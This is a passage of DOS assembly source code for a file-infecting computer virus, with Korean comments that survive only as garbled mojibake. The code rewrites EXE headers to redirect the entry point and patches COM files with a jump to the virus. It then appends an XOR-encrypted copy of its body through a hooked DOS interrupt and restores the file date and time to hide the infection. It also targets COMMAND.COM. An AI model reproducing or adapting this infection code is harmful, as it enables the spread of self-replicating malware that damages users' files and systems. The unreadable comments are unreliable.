no_inc:
mov word ptr EXE_HEADER[04h],ax ;╤Aö߃i ╕ü╣í╕≈
mov word ptr EXE_HEADER[02h],dx
mov ax,START_POINT2
mov dx,START_POINT1
div PARAGRAPH
sub ax,word ptr EXE_HEADER[08h] ;╤Aöß¼a╖í╗a
mov word ptr EXE_HEADER[16h],ax ;cs
mov word ptr EXE_HEADER[0eh],ax ;ss
mov ax,BYTESIZE
add ax,GAJASIZE-2
mov word ptr EXE_HEADER[10h],ax ;sp
mov word ptr EXE_HEADER[14h],dx ;ip
add dx,16
sub dx,RANDOM
mov word ptr virus_body[01h],dx ;╤┴╖⌐╖ü »í╕b╕±╖i
add dx,HEADSIZE ;ëü¼e╨ü ┤q╤í╬üôe
mov word ptr si_value[01h],dx ;ªüªà╖ü si/diêt╡A
mov word ptr di_value[01h],dx ;╕ß╕w
write_header:
mov ax,4200h ;╤Aö߃i │eöa
xor cx,cx
xor dx,dx
pushf
call dword ptr cs:INT21_OFF
jc int_error1
mov ah,40h
mov cx,20h
mov dx,offset EXE_HEADER
pushf
call dword ptr cs:INT21_OFF
jc int_error1
jmp virus_to_buffer
com_process:
mov ax,word ptr FILE_SIZE[00] ;COM ╤┴╖⌐╖ü ╤Aö߃i
;╕ü ╕b┤≤╨eöa
add ax,0110h
sub ax,RANDOM
mov word ptr virus_body[01h],ax
add ax,HEADSIZE
mov word ptr si_value[01h],ax ;┤q╤í╬üôe ₧ü╦Ñ╡A
mov word ptr di_value[01h],ax ;si/di êt╖i ╗ó╕≤ │eöa
mov ax,word ptr FILE_SIZE[00]
sub ax,3
mov word ptr COM_START[01],ax ;COM ╤┴╖⌐╖ü
;╤Aößêa ña╖í£ß»aƒi
mov ax,4200h ;êaƒí╟íëA ╨eöa
xor cx,cx
xor dx,dx
pushf
call dword ptr cs:INT21_OFF
jc int_error1
mov ah,40h
mov cx,3
mov dx,offset COM_START
pushf
call dword ptr cs:INT21_OFF
jc int_error1
virus_to_buffer: ;┤q╤í╤┴ƒi ╨aïí ╢ß╨ü ┤aîa
;¼w║ü»í ╨iöw╨e òA╖í╚ß ºi£Γ
mov ax,SPACE_SEG ;╡A ña╖í£ß»aƒi ╖¬┤ß╡Ñöa
mov es,ax ;╖¬┤ß╡⌐ÿüôe │a¥Aïí ┼íùa 16êüƒi
;╢ü¼σ └ü╢üëí ïa ûß╡A ╢Ñ£ü
cld ;ña╖í£ß»aƒi └ü╢àöa
xor di,di
mov ax,9090h
mov cx,GAJASIZE/2 ;│a¥Aïí ┼íùa¥í 16ña╖í╦aƒi
;└ü╢àöa
rep stosw
xor si,si
;┤q╤í╤┴╨e ña╖í£ß»aƒi
mov cx,HEADSIZE ;╨iöw╡w╡b╡A
rep movsb ;│aïí╢ß╨e ┴íïí ╕b┤≤
mov cx,BODYSIZE
move_loop2:
lodsb
xor al,byte ptr key_value[01h]
stosb ;┤q╤í╤┴╨e ña╖í£ß»aƒi
;╨iöw╡w╡b╡A ╡½ïÑöa
loop move_loop2 ;(╡½ïííe¼ß ┤q╤í╤┴)
buffer_to_file:
;╨iöw╡w╡b╡A╖╢ôe ííùe Éü╢w╖i
;╤┴╖⌐¥í ╡½ïÑöa
mov bx,FILE_HANDLE ;öe Ée«ü¥í ╖Ñ╨ü ╡½ëa╗íôe
mov ax,4202h ;»í╕b╕±╖í │a¥Aïí ┼íùa
xor cx,cx ;16ña╖í╦a║ù ┤ßôa ╨eèàòAƒi
xor dx,dx ;êaƒa╟íëAûEöa
pushf
call dword ptr cs:INT21_OFF
mov cx,ALL_BYTE
mov dx,RANDOM
mov ax,es
mov ds,ax
mov ah,40h
pushf
call dword ptr cs:INT21_OFF
repair_date: ;Éi╝aƒi ╢Ñ£üöü¥í ò⌐¥a║àöa
mov ax,5701h
mov dx,cs:FILE_DATE
mov cx,cs:FILE_TIME
pushf
call dword ptr cs:INT21_OFF
int_error1:
retn
read_handle endp
;**************************************************************
;
;
; DATA AREA BLOCK
;
;
;**************************************************************
COM_START db 0e9h ;COM╤┴╖⌐╖ü ╕±╧a┼íùa
dw 0
PSP_SEG dw 0 ;PSP SEGMENT
EXE_SP dw 0fffeh ;EXE╖üSP
EXE_SS dw 0 ;EXE╖üSS
EXE_IP dw 0 ;EXE╖üIP
EXE_CS dw 0 ;EXE╖üCS
COM_IP dw 100h ;COM╖üIP
COM_CS dw 0 ;COM╖üCS
ENV_BLOCK db 12h dup (?) ;»⌐╨ù╖i ╢ß╨e ╤┼ëw ºi£Γ
ORG_PARA dw 0 ;╤e »⌐╨ù╤┴╖⌐╖ü ╨iöwûE ╠ü£ßïa£ü╧a«ü
SPACE_SEG dw 0 ;ña╖í£ß»a òA╖í╚ß╕b┤≤╢w ╨iöwºi£Γ
VIRUS_SEG dw 0 ;ña╖í£ß»a ¼w║ü╢w ╨iöw ¡Aïaáσ╦a
FILE_TYPE db 1 ;╤┴╖⌐ ╤w╚ü
INT1C_OFF dw 0 ;INT1C_OFF
INT1C_SEG dw 0 ;INT1C_SEG
INT24_OFF dw 0 ;INT24_OFF
INT24_SEG dw 0 ;INT24_SEG
INT21_OFF dw 0 ;INT21_OFF
INT21_SEG dw 0 ;INT21_SEG
ALL_BYTE dw BYTESIZE ;ña╖í£ß»a ÑÑ┴A╖ü ╟aïí
MARKER dw 0 ;╢σòí╢ü╢w ╤Aöß ╠eöe╢w
TARGET_FILE1 db 'COMM' ;COMMAND.COM ╤┬╖Ñ╢w
FILE_NAME dd 0 ;FILE_NAME ╕ß╕w
FILE_SIZE dd 0 ;FILE_SIZE ╕ß╕w
FILE_HANDLE dw 0 ;FILE_HANDLE ╕ß╕w
FILE_ATTR dw 0 ;FILE_ATTR ╤┴╖⌐¡ó¼≈
FILE_DATE dw 0 ;FILE_DATE Éi╝a
FILE_TIME dw 0 ;FILE_TIME »íêe
FILE_NAME_START dw 0 ;COLUMNS_OFF ╤┴╖⌐╖íƒq »í╕b╕±
START_POINT2 dw 0 ;╤┴╖⌐ áàáa╗íáb ña╖í£ß»aêa ª¢╖ië╡(╨a╢ß)
START_POINT1 dw 0 ; // (¼w╢ß)
EXE_HEADER db 40h dup (0) ;EXE_HEADER
PARAGRAPH dw 0016 ;PARAGRAPH
SECTOR dw 0512 ;SECTOR
RANDOM dw 0 ;Ée«üêt1
STACK_SPACE dw 32 dup (?)
finish label byte
main ends
stac segment para stack 'stack'
db 100 dup (0)
stac ends
end start
;┬ü»Ñ : ┤üëíëí.. ¼Θíwáe ╕ΓôeòAòí ╖í£²ëA »íêe╖í ág╖í êΘƒíöaôí.
ña╖í£ß»a ╡eèü╨a»íôe ªàùi └q╣íáe ╨a¡A╢a. ╢Ñ£ü ╨q«ü╤┴ ╨ü¼ß
öa CALL╨ü¼ß │a¥aëí ╨eêσòA ña½aëA áeùiöa Ñíôí ïa£²ëA ûV»sôíöa.
╖í ña╖í£ß»aƒi áeùi«ü ╖╢ëA òí╢æ╖i║à ╡A₧ü¼i¥Q/öa╟a┤ßÑE╣a/╧í╧í
DIR-II ña╖í£ß»aƒi áeùa»Ñ ╨ü─ßùi╡AëA êq¼a ùaƒ│ôíöa.
╖íê⌡╖í èé¼e ña╖í£ß»a¥í░ß íyñσ╝ü╖Ñ╗í ííƒaëV╗íáe ╡a╕σ╙í ïí«ë╖í
┤a╗ó╖e ÿi¥a¼ß ╥Bïí╕Γ╖Ñê⌡╖e ┤eÉa╡íæA╢a. ╖í£²ëA ╕≈Ñíƒi ë╖╖A╨ü┤í
ág╖e ña╖í£ß»aêa Éa╡⌐╔EòA.
┤aóü╜í¥ó ┤ß¡Q╡e»s ág╖í╨a¡A╢a ña╖í£ß»a ág╟q ╤┬»⌐╨e ï⌐òí ┤⌠╖aôí
îa╢a
